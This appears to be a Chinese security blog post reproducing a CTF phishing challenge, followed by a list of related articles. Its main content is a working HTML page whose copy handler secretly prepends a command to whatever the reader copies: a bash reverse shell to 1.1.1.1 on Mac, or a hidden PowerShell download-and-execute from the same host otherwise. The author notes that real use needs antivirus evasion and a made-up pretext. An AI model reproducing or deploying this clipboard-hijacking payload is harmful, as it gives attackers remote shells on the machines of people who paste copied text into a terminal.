钓鱼(一)

news/2024/11/14 13:31:19/

前言

昨晚公众号看的文章一道针对安全人员进行定向攻击的CTF题,满有意思的复现一波。

复现

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>about</title>
<script>
function addLink() {var body_element = document.body;var selection;selection = window.getSelection() ? window.getSelection() : document.selection.createRange().text;var u = navigator.userAgent, app = navigator.appVersion;if (u.indexOf('Mac') > -1) {var payload = '/bin/bash -c "bash -i >& /dev/tcp/1.1.1.1/1998 0>&1" </br>';} else {var payload = 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://1.1.1.1/3\'))"' + '</br>';}if (window.clipboardData) { // Internet Explorervar copyText = payload + selection;window.clipboardData.setData("Text", copyText);return false;} else {var copyText = payload + selection;var newDiv = document.createElement('div');newDiv.style.position = 'absolute';newDiv.style.left = '-99999px';body_element.appendChild(newDiv);newDiv.innerHTML = copyText;selection.selectAllChildren(newDiv);window.setTimeout(function () {body_element.removeChild(newDiv);}, 0);}
}
document.oncopy = addLink;
</script>
</head>
<body>
<h3>联系我</h3>
python -c "print("WeChat: "+b'\x01\x00\x02\x00\x09\x02')"
</body>
</html>

效果:
about
实战powershell需要做免杀,话术自己编。


http://www.ppmy.cn/news/889764.html

相关文章

网络安全之钓鱼

网络安全之钓鱼

###【温馨提示&#xff1a;】 &#xff08;所有有关安全入侵防范知识仅供自己参考学习&#xff0c;未经别人允许入侵别人系统是违法的&#xff01;&#xff09; ###*目标 Kali模拟攻击者&#xff0c;攻击XP&#xff0c;利用DNS欺骗/ARP欺骗获取用户访问京东的账号和密码&#…
阅读更多...
关于钓鱼攻击和防范这些事

关于钓鱼攻击和防范这些事

本文将从攻击、检测处置和防范三个维度&#xff0c;分别介绍钓鱼攻击方式、钓鱼邮件安全事件运营及防范措施。 1、钓鱼攻击矩阵 1.1 钓鱼攻击概述 利用社会工程学进行攻击&#xff0c;是实战攻击中出现率非常高的手法之一。 使用钓鱼的方式突破边界&#xff0c;也是实战…
阅读更多...
当我遇到钓鱼网站

当我遇到钓鱼网站

发现钓鱼网站 我平时会刷一会儿微博&#xff0c;看看当前热门数据。 前天的时候在热门微博里看到了一则广告 <6月幸运召唤师抽奖> &#xff0c;身为一个从s3开始入手的老玩家&#xff0c;没有丝毫犹豫直接从链接点了进去。 身为程序员的我&#xff0c;近些年也算是浏览…
阅读更多...
鱼与鱼竿

鱼与鱼竿

从前&#xff0c;有两个饥饿的人得到了一位长者的恩赐&#xff1a;一根鱼竿和一篓鲜活硕大的鱼。其中&#xff0c;一个人要了一篓鱼&#xff0c;另一个人要了一根鱼竿&#xff0c;于是他们分道扬镳了。得到鱼的人原地就用干柴搭起篝火煮起了鱼&#xff0c;他狼吞虎咽&#xff0…
阅读更多...
网钓

网钓

1&#xff0c;一种网络上的欺骗手段。 2&#xff0c;欺骗方式是先制造一个虚假的网络地址&#xff0c;例如mail.a163.com.&#xff0c;这个地址和实际地址&#xff08;mail.163.com&#xff09;非常像。然后同过email&#xff0c;或者msn等方式诱骗用户登陆假的网址&#xff0…
阅读更多...
选对池塘钓大鱼([美]雷恩·吉尔森)第一章 钓鱼课:垂钓的快乐规则

选对池塘钓大鱼([美]雷恩·吉尔森)第一章 钓鱼课:垂钓的快乐规则

第一章 钓鱼课&#xff1a;垂钓的快乐规则 鱼并非均匀地分配在所有的水域上&#xff0c;同一区域&#xff0c;有人能钓到大鲤鱼&#xff0c;而另一些人则钓到的总是小鱼。因此&#xff0c;选择池塘变得十分重要了。在这个池塘钓鱼&#xff0c;我是经过反复地选择的&#xff0c;…
阅读更多...
单目标优化:蜣螂优化算法(Dung beetle optimizer,DBO)

单目标优化:蜣螂优化算法(Dung beetle optimizer,DBO)

蜣螂优化算法&#xff08;Dung beetle optimizer&#xff0c;DBO&#xff09;由Jiankai Xue和Bo Shen于2022年提出&#xff0c;该算法主要受蜣螂的滚球、跳舞、觅食、偷窃和繁殖行为的启发所得。 一、蜣螂优化算法 1.1蜣螂滚球 &#xff08;1&#xff09;当蜣螂前行无障碍时…
阅读更多...
防范网络钓鱼仍然很重要!

防范网络钓鱼仍然很重要!

在众多网络攻击中&#xff0c;网络钓鱼可以说是攻击者最喜欢使用的攻击手段之一。据《2022年数据泄露成本报告》显示&#xff0c;网络钓鱼已成为数据泄露的第二大方式&#xff0c;占比达16%&#xff0c;给受访组织造成高达491万美元的泄露成本。 钓鱼者可以攻击任何在线服务中的…
阅读更多...
最新文章

Copyright @ 2022~2023